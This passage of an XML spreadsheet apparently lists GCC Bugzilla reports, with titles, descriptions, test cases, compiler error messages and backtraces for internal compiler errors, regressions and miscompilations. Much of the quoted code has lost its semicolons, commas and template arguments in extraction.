enc_filebuf doesn't work with 3.2.3 or 3.3.2 either it causes linker
errors.</t>
  </si>
  <si>
    <t>GCC-29273</t>
  </si>
  <si>
    <t>error on dynamic_cast(array)</t>
  </si>
  <si>
    <t>Gcc gives an error for the dynamic_cast below. During the discussion of bug 29185 with EDG it turned out that according to 5 p8 the code is well-formed and should not be diagnosed.
$ cat t.cpp &amp;&amp; gcc t.cpp
struct A { virtual ~A () { } }
struct B: A { } b [1]
void foo ()
{
    dynamic_cast(b)
}
t.cpp: In function 'void foo()':
t.cpp:6: error: cannot dynamic_cast 'b' (of type 'struct B [1]') to type 'struct B*' (source is not a pointer)</t>
  </si>
  <si>
    <t>GCC-33666</t>
  </si>
  <si>
    <t>[4.3 Regression] Type verification failure with pointer to long long conversion</t>
  </si>
  <si>
    <t>The following fails with 32bit pointers and 64bit long long if the compiler is
built with type-checking enabled.
void __lock_get_list(void *dp)
{
  if (((unsigned int)dp + 1) &amp; ~1ULL)
}
The original trees look ok:
  if (((long long unsigned int) (dp + 1) &amp; 0x0fffffffffffffffe) != 0)
    {
      (void) 0
    }</t>
  </si>
  <si>
    <t>GCC-56484</t>
  </si>
  <si>
    <t>[4.8 Regression] ICE in assign_by_spills at lra-assigns.c:1268</t>
  </si>
  <si>
    <t>Created attachment 29552
Test case
The attached test case ICEs on trunk (svn revision: 196329) as follows:
$ x86_64-unknown-linux-gnu-gcc -O2 besttry.c
besttry.c: In function â€˜output_spdifâ€™:
besttry.c:26:1: internal compiler error: in assign_by_spills at lra-assigns.c:1268
 }
 ^
0x7f1cf8 assign_by_spills
	/work/sources/gcc-fsf/master/gcc/lra-assigns.c:1268
0x7f29b3 lra_assign()
	/work/sources/gcc-fsf/master/gcc/lra-assigns.c:1425
0x7eebe1 lra(_IO_FILE*)
	/work/sources/gcc-fsf/master/gcc/lra.c:2307
0x7b6e18 do_reload
	/work/sources/gcc-fsf/master/gcc/ira.c:4619
0x7b6e18 rest_of_handle_reload
	/work/sources/gcc-fsf/master/gcc/ira.c:4731
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Believe this is a target issue as the original test case does not trigger the failure for arm-none-linux-gnueabihf</t>
  </si>
  <si>
    <t>GCC-9454</t>
  </si>
  <si>
    <t>[3.4 regression][New parser] ICE in lookup_member at cp/search.c:1503</t>
  </si>
  <si>
    <t>This ICEs with the new parser:
------------------------------
template  struct Outer {
    struct B            { operator int () }
    struct D : public B { operator int () }
}
Outer o
------------------------------
g/a&gt; /home/bangerth/bin/gcc-3.4-pre/bin/c++ -c bug34-1.cc
bug34-1.cc:3: internal compiler error: in lookup_member at cp/search.c:1503
Please submit a full bug report
It works with 3.3 and previous though.
W.
Release:
unknown
Environment:
present 3.4</t>
  </si>
  <si>
    <t>GCC-50716</t>
  </si>
  <si>
    <t>Segmentation fault caused by misaligned vector access</t>
  </si>
  <si>
    <t>The following code segfaults on i386 + sse targets:
typedef int vec __attribute__((vector_size(16)))
int main ()
{
 int * arr = __builtin_malloc (1024)
 vec *p = (vec *) 
 *p = (vec){1 2 3 4}
 return *(char *)p
}
The problem is that *p = (vec){1234} produces aligned move instead of unaligned.  Most likely this could be reproduced on any target with SIMD extensions where aligned move differs from unaligned.</t>
  </si>
  <si>
    <t>tema</t>
  </si>
  <si>
    <t>GCC-28161</t>
  </si>
  <si>
    <t>Wrong bit field layout with -mms-bitfields</t>
  </si>
  <si>
    <t>Several g++ tests in tmpdir-g++.dg-struct-layout-1 fail with
the execution error.  A reduced testcase is
extern C void abort (void)
struct S
{
  long long d:23
  int e:32
  int f:32
} a
int main (void)
{
  a.e = -3
  a.f = 1
  if (a.e != -3)
    abort ()
  return 0
}
which shows that the current compiler allocates a.e and a.f in
an overlapped manner with -mms-bitfields.  With that option
the 4.1 compiler allocates a field in the first 8-byte for a.d
the next 4-byte for a.e and the another 4-byte for a.f but 4.2
allocates 23-bit for a.d the next 32-bit for a.e and the last
32-bit for a.f in the same 8-byte.</t>
  </si>
  <si>
    <t>GCC-63784</t>
  </si>
  <si>
    <t>[5 Regression] profiledbootstrap failure with bootstrap-lto</t>
  </si>
  <si>
    <t>On Linux/x86-64 configured with
--enable-clocale=gnu --with-system-zlib --with-demangler-in-ld MAKEINFO=/usr/bin/false --enable-languages=cc++ --enable-bootstrap --with-build-config=bootstrap-lto --disable-werror --disable-multilib
r216964 gave:
/bin/sh ./libtool --tag=CXX   --mode=link /export/project/git/gcc-regression-bootstrap/master/216981/bld/./gcc/xg++ -B/export/project/git/gcc-regression-bootstrap/master/216981/bld/./gcc/ -nostdinc++ `if test -f /export/project/git/gcc-regression-bootstrap/master/216981/bld/x86_64-unknown-linux-gnu/libstdc++-v3/scripts/testsuite_flags then /bin/sh /export/project/git/gcc-regression-bootstrap/master/216981/bld/x86_64-unknown-linux-gnu/libstdc++-v3/scripts/testsuite_flags --build-includes else echo -funconfigured-libstdc++-v3  fi` -L/export/project/git/gcc-regression-bootstrap/master/216981/bld/x86_64-unknown-linux-gnu/libstdc++-v3/src -L/export/project/git/gcc-regression-bootstrap/master/216981/bld/x86_64-unknown-linux-gnu/libstdc++-v3/src/.libs -L/export/project/git/gcc-regression-bootstrap/master/216981/bld/x86_64-unknown-linux-gnu/libstdc++-v3/libsupc++/.libs -B/export/project/git/gcc-regression-bootstrap/master/216981/usr/x86_64-unknown-linux-gnu/bin/ -B/export/project/git/gcc-regression-bootstrap/master/216981/usr/x86_64-unknown-linux-gnu/lib/ -isystem /export/project/git/gcc-regression-bootstrap/master/216981/usr/x86_64-unknown-linux-gnu/include -isystem /export/project/git/gcc-regression-bootstrap/master/216981/usr/x86_64-unknown-linux-gnu/sys-include    -W -Wall  -fvisibility=hidden -g -O2 -D_GNU_SOURCE -module -export-symbols /export/project/git/gcc-regression/gcc/libcc1/libcc1.sym  -Xcompiler '-static-libstdc++' -Xcompiler '-static-libgcc' -o libcc1.la -rpath /export/project/git/gcc-regression-bootstrap/master/216981/usr/lib/../lib64 findcomp.lo libcc1.lo names.lo callbacks.lo connection.lo marshall.lo  -Wc../libiberty/pic/libiberty.a 
/usr/local/bin/ld: /tmp/ccqqkUWo.ltrans0.ltrans.o: relocation R_X86_64_32S against `prime_tab.lto_priv.2' can not be used when making a shared object recompile with -fPIC
/tmp/ccqqkUWo.ltrans0.ltrans.o: error adding symbols: Bad value
collect2: error: ld returned 1 exit status
make[3]: *** [libcc1.la] Error 1
when building with make profiledbootstrap.</t>
  </si>
  <si>
    <t>GCC-41204</t>
  </si>
  <si>
    <t>[4.4/4.5 regression] worse code generated compared to GCC 4.3.2</t>
  </si>
  <si>
    <t>Hi
When I compile this C code:
#include 
inline int mid_pred(int a int b int c)
{
    int t= (a-b)
    a-=t
    b+=t
    b-= (b-c)
    b+= (a-b)
    return b
}
I get this asm output from GCC 4.3.2 (-m68060 -fomit-frame-pointer -O[2/3]):
#NO_APP
	.text
	.even
	.globl	_mid_pred
_mid_pred:
	movem.l #14336-(sp)
	move.l 16(sp)d2
	move.l 20(sp)d1
	move.l d2d0
	sub.l d1d0
	move.l d0d4
	add.l d4d4
	subx.l d4d4
	and.l d0d4
	add.l d4d1
	move.l d1d3
	sub.l 24(sp)d3
	move.l d3d0
	add.l d0d0
	subx.l d0d0
	and.l d3d0
	sub.l d0d1
	sub.l d4d2
	sub.l d1d2
	move.l d2d0
	add.l d0d0
	subx.l d0d0
	and.l d2d0
	add.l d1d0
	movem.l (sp)+#28
	rts
When I use GCC 4.4.[0/1/2] with -O2/-O3 option I get worse asm output (2 additional move.ls):
#NO_APP
	.text
	.even
	.globl	_mid_pred
_mid_pred:
	movem.l #14336-(sp)
	move.l 16(sp)d1
	move.l 20(sp)d0
	move.l d1d3
	sub.l d0d3
	move.l d3d2
	add.l d2d2
	subx.l d2d2
	and.l d3d2
	add.l d2d0
	move.l d0d4
	sub.l 24(sp)d4
	move.l d4d3
	add.l d3d3
	subx.l d3d3
	and.l d4d3
	sub.l d3d0
	move.l d0d3
	sub.l d2d1
	sub.l d0d1
	move.l d1d2
	add.l d2d2
	subx.l d2d2
	and.l d1d2
	move.l d2d0
	add.l d3d0
	movem.l (sp)+#28
	rts
The problematic optimization is -fregmove (-m68060 -fomit-frame-pointer -O[2/3] -fno-regmove):
#NO_APP
	.text
	.even
	.globl	_mid_pred
_mid_pred:
	movem.l #14336-(sp)
	move.l 16(sp)d0
	move.l 20(sp)d1
	move.l d0d2
	sub.l d1d2
	move.l d2d3
	add.l d3d3
	subx.l d3d3
	and.l d3d2
	add.l d2d1
	move.l d1d3
	sub.l 24(sp)d3
	move.l d3d4
	add.l d4d4
	subx.l d4d4
	and.l d4d3
	sub.l d3d1
	sub.l d2d0
	sub.l d1d0
	move.l d0d2
	add.l d2d2
	subx.l d2d2
	and.l d2d0
	add.l d1d0
	movem.l (sp)+#28
	rts</t>
  </si>
  <si>
    <t>ami_stuff</t>
  </si>
  <si>
    <t>GCC-78686</t>
  </si>
  <si>
    <t>ICE in gfc_apply_init at fortran/expr.c:4124</t>
  </si>
  <si>
    <t>With invalid code down to at least 4.8 :
$ cat z1.f90
program p
   type t
      character :: c(1) = [t()]
   end type
end
$ gfortran-7-20161204 z1.f90
f951: internal compiler error: in gfc_apply_init at fortran/expr.c:4124
0x6911be gfc_apply_init(gfc_typespec* symbol_attribute* gfc_expr*)
        ../../gcc/fortran/expr.c:4124
0x684d98 build_struct
        ../../gcc/fortran/decl.c:1942
0x684d98 variable_decl
        ../../gcc/fortran/decl.c:2437
0x684d98 gfc_match_data_decl()
        ../../gcc/fortran/decl.c:4892
0x6dca79 match_word_omp_simd
        ../../gcc/fortran/parse.c:93
0x6e002e match_word
        ../../gcc/fortran/parse.c:377
0x6e002e decode_statement
        ../../gcc/fortran/parse.c:377
0x6e1e34 next_free
        ../../gcc/fortran/parse.c:1180
0x6e1e34 next_statement
        ../../gcc/fortran/parse.c:1413
0x6e337a parse_derived
        ../../gcc/fortran/parse.c:3233
0x6e337a parse_spec
        ../../gcc/fortran/parse.c:3773
0x6e5bb3 parse_progunit
        ../../gcc/fortran/parse.c:5615
0x6e71a4 gfc_parse_file()
        ../../gcc/fortran/parse.c:6124
0x72b182 gfc_be_parse_file
        ../../gcc/fortran/f95-lang.c:202</t>
  </si>
  <si>
    <t>GCC-82808</t>
  </si>
  <si>
    <t>[7/8 Regression] LTO clone wrong value</t>
  </si>
  <si>
    <t>Version: trunk@254336 7.x
* work on 6.x
Option:
gcc case.c -O2 -fno-inline -flto
How to reproduce:
./a.out
Aborted (core dumped)
Expect:
exited normally
Case:
void foo(double *a double x)
{
  *a = x
}
double f_c1(int m double *a)
{
  foo(a m)
  return *a
}
int main(){
  double data
  double ret = 0 
  if ((ret = f_c1(2 &amp;data)) != 2)
    {
      __builtin_abort ()
    }
  return 0
}
Symptom:
`x` in `foo` seems like propagated as 0.
Code gen in x86_64
foo.constprop.1:
.LFB3:
        .cfi_startproc
        movq    $0x000000000 (%rdi)
        ret
        .cfi_endproc
.LFE3:
        .size   foo.constprop.1 .-foo.constprop.1
        .p2align 415
        .type   f_c1.constprop.0 @function</t>
  </si>
  <si>
    <t>npickito</t>
  </si>
  <si>
    <t>GCC-22005</t>
  </si>
  <si>
    <t>[4.1 Regression] ICE: SSA_NAME verification failure</t>
  </si>
  <si>
    <t>CVS HEAD of today gives me a bunch of SSA errors and finally an ICE on this file
(taken from CLN) when optimization is turned on:
g++ -O1  -c cl_prin_globals.ii
bzip'ed file plus error output attached.  Sorry for the suboptimal naming (don't
know what is happening here) and the large file size.</t>
  </si>
  <si>
    <t>Ralf.Wildenhues</t>
  </si>
  <si>
    <t>GCC-3873</t>
  </si>
  <si>
    <t>Re: Problem with generic member</t>
  </si>
  <si>
    <t xml:space="preserve"> fasbjx@libertysurf.fr
 What is it with that empty template template?
 fasbjx@libertysurf.fr (fasbjx@libertysurf.fr) said thusly on [28/07/01 at 02:54]:
 &gt; 
 &gt; &gt;Environment:
 &gt; System: Linux alpha.tchume.net 2.4.4 #2 mar mai 22 08:16:07 CEST 2001 i586 unknown
 &gt; Architecture: i586
 &gt; 
 &gt; 	
 &gt; host: i386-pc-linux-gnu
 &gt; build: i386-pc-linux-gnu
 &gt; target: i386-pc-linux-gnu
 &gt; configured with: ../src/configure -v --enable-languages=cc++javaf77protoobjc --prefix=/usr --infodir=/share/info --mandir=/share/man --enable-shared --with-gnu-as --with-gnu-ld --with-system-zlib --enable-long-long --enable-nls --without-x --witho ut-included-gettext --disable-checking --enable-threads=posix --enable-java-gc=boehm --with-cpp-install-dir=bin --enable-objc-gc i386-linux
 &gt; &gt;Description:
 &gt; 	
 &gt; The following code:
 &gt; 
 &gt; enum X { L }
 &gt; 
 &gt; template
 &gt; struct Sa { enum E {} }
 &gt; 
 &gt;   
 &gt; template
 &gt; struct Sb {
 &gt;   template::E e &gt;
 &gt;   class C
 &gt; } 
 &gt; 
 &gt; template
 &gt; struct Sb {
 &gt;   template::E e &gt;
 &gt;   struct D: public Sb::C
 &gt; }
 &gt; 
 &gt; don't compile. From codesourcery:
 &gt; 
 &gt; 
 What is past is prologue.  (William Shakespeare)
Release:
unknown</t>
  </si>
  <si>
    <t>adetalabi</t>
  </si>
  <si>
    <t>GCC-5743</t>
  </si>
  <si>
    <t>RE: can't install gcc for h8300-hms target (2)</t>
  </si>
  <si>
    <t xml:space="preserve"> Hi Stefan
 &gt; I hereby refer to problem report #4828 which tells of a bug in
 &gt; gcc-3.0 that disables installing gcc-3.0 for h8300-hms targets.
 &gt; 
 &gt; The case was closed due to a patch
 &gt;
 (http://prdownloads.sourceforge.net/h8300-hms/h8300-hms-gcc-3.0.2-1.patch).
 &gt; 
 &gt; Exactly the same problem however is true for me when trying to
 &gt; install gcc-3.0.3 for h8300-hms.
 The author of the patch for expr.c was not able to convince people
 that the fix is correct.  This is why gcc-3.0.3 still has the same
 problem.
 Kazu Hirata
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-45754</t>
  </si>
  <si>
    <t>Driver core dump when duplicating -Wall command line option</t>
  </si>
  <si>
    <t>The following command line causes the gcc/g++ driver front-end to crash with a core dump (segmentation fault):
gcc -O -O -O -O -O -O -O -O -O -O -O -O -O -O -O -O -O -O -O -O -Wall -Wall hello.cpp
Note: The example is only meant as easy to reproduce failing case. Actually the problem occured in a command line with mixed options that happened to repeat -Wall two times and by accident had the right number of other options -D -I ... in a qmake-generated Makefile.
The EXACT number of command line options is critical: with more or with lesser options the problem is NOT triggered.
Also the option -Wall may be mixed with the others as long as it appears exactly two times OR three times. 
For further info complete -v output:
Configured with: /gnu/gcc/releases/respins/4.3.4-3a/gcc4-4.3.4-3/src/gcc-4.3.4/configure --srcdir=/gnu/gcc/releases/respins/4.3.4-3a/gcc4-4.
3.4-3/src/gcc-4.3.4 --prefix=/usr --exec-prefix=/usr --bindir=/usr/bin --sbindir=/usr/sbin --libexecdir=/usr/lib --datadir=/usr/share --loca
lstatedir=/var --sysconfdir=/etc --infodir=/usr/share/info --mandir=/usr/share/man --datadir=/usr/share --infodir=/usr/share/info --mandir=/
usr/share/man -v --with-gmp=/usr --with-mpfr=/usr --enable-bootstrap --enable-version-specific-runtime-libs --with-slibdir=/usr/bin --libexe
cdir=/usr/lib --enable-static --enable-shared --enable-shared-libgcc --disable-__cxa_atexit --with-gnu-ld --with-gnu-as --with-dwarf2 --disa
ble-sjlj-exceptions --enable-languages=adacc++fortranjavaobjcobj-c++ --disable-symvers --enable-libjava --program-suffix=-4 --enable-l
ibgomp --enable-libssp --enable-libada --enable-threads=posix --with-arch=i686 --with-tune=generic --enable-libgcj-sublibs CC=gcc-4 CXX=g++-
4 CC_FOR_TARGET=gcc-4 CXX_FOR_TARGET=g++-4 GNATMAKE_FOR_TARGET=gnatmake GNATBIND_FOR_TARGET=gnatbind --with-ecj-jar=/usr/share/java/ecj.jar
Thread model: posix
gcc version 4.3.4 20090804 (release) 1 (GCC)</t>
  </si>
  <si>
    <t>Martin.Weitzel</t>
  </si>
  <si>
    <t>GCC-40749</t>
  </si>
  <si>
    <t xml:space="preserve">[4.3 Regression] g++ doesnt report missing return if return is of type const </t>
  </si>
  <si>
    <t xml:space="preserve">This code below wont generate a warning for function a(). Compiled with -Wall. If you remove the const from the return it will work.
class A {
public:
}
const A a() {
}
int main() {
  A b = a()
}
</t>
  </si>
  <si>
    <t>mfribeiro</t>
  </si>
  <si>
    <t>GCC-45182</t>
  </si>
  <si>
    <t>[4.6 regression] Failed to build SPEC CPU 2000/2006</t>
  </si>
  <si>
    <t>On Linux/x86-64 revision 162853 failed to
build SPEC CPU 2000/2006:
With runspec -c lnx-x86_64-gcc.cfg -T base -n 1 -l -o asc -I all -e o3
Error with make 'specmake -j `/usr/bin/getconf _NPROCESSORS_ONLN` build &gt; make.out 2&gt; make.err': check file '/export/gnu/import/svn/gcc-test/spec/2000/x86_64/spec/benchspec/CINT2000/254.gap/run/00000001/make.err'
  Error with make!
*** Error building 254.gap
Error with make 'specmake -j `/usr/bin/getconf _NPROCESSORS_ONLN` build &gt; make.out 2&gt; make.err': check file '/export/gnu/import/svn/gcc-test/spec/2000/x86_64/spec/benchspec/CINT2000/256.bzip2/run/00000001/make.err'
  Error with make!
*** Error building 256.bzip2
Error: 1x254.gap 1x256.bzip2
With runspec -c lnx-x86_64-gcc.cfg -T base -n 1 -l -o asc -I all -e o3
Error with make 'specmake -j `/usr/bin/getconf _NPROCESSORS_ONLN` build': check file '/export/gnu/import/svn/gcc-test/spec/2006/x86_64/spec/benchspec/CPU2006/401.bzip2/build/build_base_o3.0000/make.err'
  Error with make!
*** Error building 401.bzip2
Error with make 'specmake -j `/usr/bin/getconf _NPROCESSORS_ONLN` build': check file '/export/gnu/import/svn/gcc-test/spec/2006/x86_64/spec/benchspec/CPU2006/464.h264ref/build/build_base_o3.0000/make.err'
  Error with make!
*** Error building 464.h264ref
Build errors: 401.bzip2(base CE) 464.h264ref(base CE)
Error: 1x401.bzip2 1x464.h264ref
Revision 162839 is OK. One error is:
gcc -c -o range.o   -DSPEC_CPU2000_LP64 -DSYS_IS_USG -DSYS_HAS_IOCTL_PROTO -DSYS_HAS_TIME_PROTO -DSYS_HAS_SIGNAL_PROTO -DSYS_HAS_CALLOC_PROTO -DSYS_HAS_READ_PROTO        -O2 -ffast-math -O3 -ffast-math -funroll-loops  range.c
range.c: In function 'PlainRange':
range.c:557:1: internal compiler error: in trunc_int_for_mode at explow.c:57
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-28692</t>
  </si>
  <si>
    <t>[4.2 Regression] ICE in rtl_for_decl_init at dwarf2out.c</t>
  </si>
  <si>
    <t>When I compile the small program I get an ICE.
By checking with older compiler versions I found this bug was introduced between gcc-4.2-20060325 and gcc-4.2-20060401.
Michael Cieslinski
dwarf2out_bug.c:
    typedef float FloatVect __attribute__((__vector_size__(16)))
    static FloatVect Foo = { 250000000.0 0.0 0.0 0.0}
g++42v -g dwarf2out_bug.c
dwarf2out_bug.c:1: internal compiler error: in rtl_for_decl_init at dwarf2out.c:9959
Please submit a full bug report with preprocessed source if appropriate.
g++42v -v
Using built-in specs.
Target: x86_64-unknown-linux-gnu
Configured with: ../gcc-4.2-20060729/configure --prefix=/usr/local/gcc42v
 --program-suffix=42v --with-arch=opteron --enable-languages=cc++
 --enable-__cxa_atexit --disable-nls --enable-threads=posix
 --disable-multilib --enable-checking
Thread model: posix
gcc version 4.2.0 20060729 (experimental)</t>
  </si>
  <si>
    <t>GCC-20396</t>
  </si>
  <si>
    <t>TRULY_NOOP_TRUNCATION ignored</t>
  </si>
  <si>
    <t>There are a number of places in the compiler that assume that
TRULY_NOOP_TRUNCATION will always be true.</t>
  </si>
  <si>
    <t>GCC-3196</t>
  </si>
  <si>
    <t>Internal compiler error in subreg_highpart_offset in gnu/gcj/math/.libs/MPN.o</t>
  </si>
  <si>
    <t>When compiling make bootstrap I get the following error:
/usr/usr3/jddahl/compile/objdir/gcc/gcj -B/usr/usr3/jddahl/compile/objdir/sparc-sun-solaris2.6/libjava/ -B/usr/usr3/jddahl/compile/objdir/gcc/ --encoding=UTF-8 -fassume-compiled -fclasspath=/usr/usr3/jddahl/compile/objdir/sparc-sun-solaris2.6/libjava -L/usr/usr3/jddahl/compile/objdir/sparc-sun-solaris2.6/libjava -g -O2 -MD -MT gnu/gcj/math/MPN.lo -MF gnu/gcj/math/MPN.d -c ../../../gcc/libjava/gnu/gcj/math/MPN.java -fPIC -o gnu/gcj/math/.libs/MPN.o
../../../gcc/libjava/gnu/gcj/math/MPN.java: In class `gnu.gcj.math.MPN':
../../../gcc/libjava/gnu/gcj/math/MPN.java: In method `gnu.gcj.math.MPN.add_1(int[]int[]intint)':
../../../gcc/libjava/gnu/gcj/math/MPN.java:712: Internal compiler error in subreg_highpart_offset at emit-rtl.c:1171
Release:
unknown
Environment:
SunOS 5.6 Generic_105181-25 sun4m sparc SUNWSPARCstation-20
How-To-Repeat:
make bootstrap</t>
  </si>
  <si>
    <t>GCC-7497</t>
  </si>
  <si>
    <t>ice on large bool array not on small or huge array</t>
  </si>
  <si>
    <t>Code declares a bool array.  When the array is ~125000 
square (large yes but that's not the biggest issue) g++ 
gives an ICE in 'assign_stack_temp_for_type'.  When the size 
is significantly reduced it compiles fine.  Oddly enough 
however when the size is significantly increased (~1000000 
square) it also compiles without error (of course it also 
seg faults when run but that's beside the point).
As I am not the administrator of the network I work on I cannot 
upgrade to gcc 3.1 to determine if this problem still exists 
in the current release.
Release:
2.95.2 19991024
How-To-Repeat:
declare boolean array of size ~125000x~125000</t>
  </si>
  <si>
    <t>sekelly</t>
  </si>
  <si>
    <t>GCC-43699</t>
  </si>
  <si>
    <t>[4.6 regression] variable set but not used error during bootstrap</t>
  </si>
  <si>
    <t>Mainline doesn't bootstrap anymore on some SuSE versions:
/home/eric/svn/gcc/gcc/collect2.c:1990:90: error: variable '__u' set but not used
/home/eric/svn/gcc/gcc/collect2.c:1992:76: error: variable '__u' set but not used
/home/eric/svn/gcc/gcc/collect2.c:1995:66: error: variable '__u' set but not used
/home/eric/svn/gcc/gcc/collect2.c:1999:74: error: variable '__u' set but not used
/home/eric/svn/gcc/gcc/collect2.c:2000:72: error: variable '__u' set but not used
Preprocessed file to be attached.  Compile with -Wall -Werror.</t>
  </si>
  <si>
    <t>GCC-15669</t>
  </si>
  <si>
    <t>Usage of bugzilla Known to work and known to fail fields need documentation</t>
  </si>
  <si>
    <t>See discussion at bug 15296.  Current practice is suggested
to be documented in .</t>
  </si>
  <si>
    <t>GCC-3832</t>
  </si>
  <si>
    <t>ICE on an odd combination of language features</t>
  </si>
  <si>
    <t>// This code generates ICE.
// If you cut out any part of it the problem goes away.
template 
void f()
{
    struct C {
        void g() { try {} catch (...) {} }
        void h()
    }
}
main ()
{
    f  ()
}
Release:
3.0
Environment:
Linux/Intel
How-To-Repeat:
g++ try.cpp</t>
  </si>
  <si>
    <t>GCC-38410</t>
  </si>
  <si>
    <t>[4.4 regression] g++.dg/eh/crossjump1.C (internal compiler error)</t>
  </si>
  <si>
    <t>Between r142401 which worked and r142425 the following regressions appeared on both powerpc-apple-darwin8/9 and powerpc-ibm-aix5.3.0.0. On powerpc-apple-darwin9 these failures appear as...
Executing on host: /sw/src/fink.build/gcc44-4.3.999-20081204/darwin_objdir/gcc/testsuite/g++/../../g++ -B/sw/src/fink.build/gcc44-4.3.999-20081204/darwin_objdir/gcc/testsuite/g+
+/../../ /sw/src/fink.build/gcc44-4.3.999-20081204/gcc-4.4-20081204/gcc/testsuite/g++.dg/eh/crossjump1.C  -nostdinc++ -I/sw/src/fink.build/gcc44-4.3.999-20081204/darwin_objdir/p
owerpc-apple-darwin9/libstdc++-v3/include/powerpc-apple-darwin9 -I/sw/src/fink.build/gcc44-4.3.999-20081204/darwin_objdir/powerpc-apple-darwin9/libstdc++-v3/include -I/sw/src/fi
nk.build/gcc44-4.3.999-20081204/gcc-4.4-20081204/libstdc++-v3/libsupc++ -I/sw/src/fink.build/gcc44-4.3.999-20081204/gcc-4.4-20081204/libstdc++-v3/include/backward -I/sw/src/fink
.build/gcc44-4.3.999-20081204/gcc-4.4-20081204/libstdc++-v3/testsuite/util -fmessage-length=0  -O2    -L/sw/src/fink.build/gcc44-4.3.999-20081204/darwin_objdir/powerpc-apple-dar
win9/./libstdc++-v3/src/.libs  -L/sw/src/fink.build/gcc44-4.3.999-20081204/darwin_objdir/powerpc-apple-darwin9/./libstdc++-v3/src/.libs -L/sw/src/fink.build/gcc44-4.3.999-200812
04/darwin_objdir/powerpc-apple-darwin9/./libiberty  -multiply_defined suppress -lm   -o ./crossjump1.exe    (timeout = 300)
/sw/src/fink.build/gcc44-4.3.999-20081204/gcc-4.4-20081204/gcc/testsuite/g++.dg/eh/crossjump1.C: In function 'void foo()':
/sw/src/fink.build/gcc44-4.3.999-20081204/gcc-4.4-20081204/gcc/testsuite/g++.dg/eh/crossjump1.C:21: internal compiler error: in expr_size at explow.c:250
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
compiler exited with status 1
output is:
/sw/src/fink.build/gcc44-4.3.999-20081204/gcc-4.4-20081204/gcc/testsuite/g++.dg/eh/crossjump1.C: In function 'void foo()':
/sw/src/fink.build/gcc44-4.3.999-20081204/gcc-4.4-20081204/gcc/testsuite/g++.dg/eh/crossjump1.C:21: internal compiler error: in expr_size at explow.c:250
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
FAIL: g++.dg/eh/crossjump1.C (internal compiler error)
FAIL: g++.dg/eh/crossjump1.C (test for excess errors)
Excess errors:
/sw/src/fink.build/gcc44-4.3.999-20081204/gcc-4.4-20081204/gcc/testsuite/g++.dg/eh/crossjump1.C:21: internal compiler error: in expr_size at explow.c:250
WARNING: g++.dg/eh/crossjump1.C compilation failed to produce executable
The intervening c++ changes were...
------------------------------------------------------------------------
r142418 | jason | 2008-12-03 18:57:19 -0500 (Wed 03 Dec 2008) | 6 lines
        PR c++/38232
        * init.c (build_value_init): Do initial zero-initialization
        of a class with an implicitly-defined constructor using
        build_zero_init rather than in build_value_init.
        (build_value_init_1): Fold into build_value_init.
------------------------------------------------------------------------
r142410 | jason | 2008-12-03 16:42:22 -0500 (Wed 03 Dec 2008) | 5 lines
        PR c++/38256
        * parser.c (cp_parser_conversion_type_id): Diagnose
        'operator auto' here.
        * decl.c (grokdeclarator): Not here.
------------------------------------------------------------------------
r142404 | jason | 2008-12-03 14:22:08 -0500 (Wed 03 Dec 2008) | 6 lines
        PR c++/38380
        * decl.c (grokdeclarator): Only set DECL_NONCONVERTING_P
        on explicit constructors.
        * pt.c (tsubst_copy_and_build) [CONSTRUCTOR]: Propagate
        CONSTRUCTOR_IS_DIRECT_INIT.</t>
  </si>
  <si>
    <t>GCC-61170</t>
  </si>
  <si>
    <t>FAIL: libgomp.fortran/declare-simd-[12].f90 on darwin</t>
  </si>
  <si>
    <t>The tests libgomp.fortran/declare-simd-[12].f90 fail on darwin because gfortran generates avx code not supported by the native 'as'. This can be fixed with the following patch (using clang assembler)
diff -up ../_clean/libgomp/testsuite/libgomp.fortran/declare-simd-1.f90 libgomp/testsuite/libgomp.fortran/declare-simd-1.f90
--- ../_clean/libgomp/testsuite/libgomp.fortran/declare-simd-1.f90	2014-05-12 09:39:21.000000000 +0200
+++ libgomp/testsuite/libgomp.fortran/declare-simd-1.f90	2014-05-12 14:50:04.000000000 +0200
@@ -16 +17 @@
 ! { dg-options -fno-inline }
 ! { dg-additional-options -msse2 { target sse2_runtime } }
 ! { dg-additional-options -mavx { target avx_runtime } }
+! { dg-additional-options -Wa-q { target x86_64-apple-darwin13* } }
 module declare_simd_1_mod
   contains
diff -up ../_clean/libgomp/testsuite/libgomp.fortran/declare-simd-2.f90 libgomp/testsuite/libgomp.fortran/declare-simd-2.f90
--- ../_clean/libgomp/testsuite/libgomp.fortran/declare-simd-2.f90	2014-05-12 09:39:21.000000000 +0200
+++ libgomp/testsuite/libgomp.fortran/declare-simd-2.f90	2014-05-12 14:50:36.000000000 +0200
@@ -36 +37 @@
   ! { dg-additional-sources declare-simd-3.f90 }
 ! { dg-additional-options -msse2 { target sse2_runtime } }
 ! { dg-additional-options -mavx { target avx_runtime } }
+! { dg-additional-options -Wa-q { target x86_64-apple-darwin13* } }
 module declare_simd_2_mod
   contains
except for the tests with -flto: see pr61168.</t>
  </si>
  <si>
    <t>GCC-32703</t>
  </si>
  <si>
    <t>ICE with [trim(character_variable)]</t>
  </si>
  <si>
    <t>For the program
program array_char
implicit none
character (len=1) :: x
x = a
print*[trim(x)]
end program array_char
compiling on Windows XP with
gfortran -v xconcat.f90
produces an ICE:
Driving: gfortran -v xconcat.f90 -lgfortranbegin -lgfortran
Using built-in specs.
Target: i386-pc-mingw32
Configured with: ../trunk/configure --prefix=/mingw --enable-languages=cfortran --with-gmp=/home/coudert/local --disable-nls --with-ld=/mingw/bin/ld --with-as=/mingw/bin/as --disable-werror --enable-bootstrap --enable-threads --build=i386-pc-mingw32 --disable-shared --enable-libgomp
Thread model: win32
gcc version 4.3.0 20070706 (experimental)
 c:/programs/gfortran/bin/../libexec/gcc/i386-pc-mingw32/4.3.0/f951.exe xconcat.f90 -quiet -dumpbase xconcat.f90 -mtune=i386 -auxbase xconcat -version -fintrinsic-modules-path c:/programs/gfortran/bin/../lib/gcc/i386-pc-mingw32/4.3.0/finclude -o C:\DOCUME~1\vrao\LOCALS~1\Temp/cc8grzTr.s
GNU F95 version 4.3.0 20070706 (experimental) (i386-pc-mingw32)
	compiled by GNU C version 4.3.0 20070706 (experimental) GMP version 4.2.1 MPFR version 2.2.1.
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
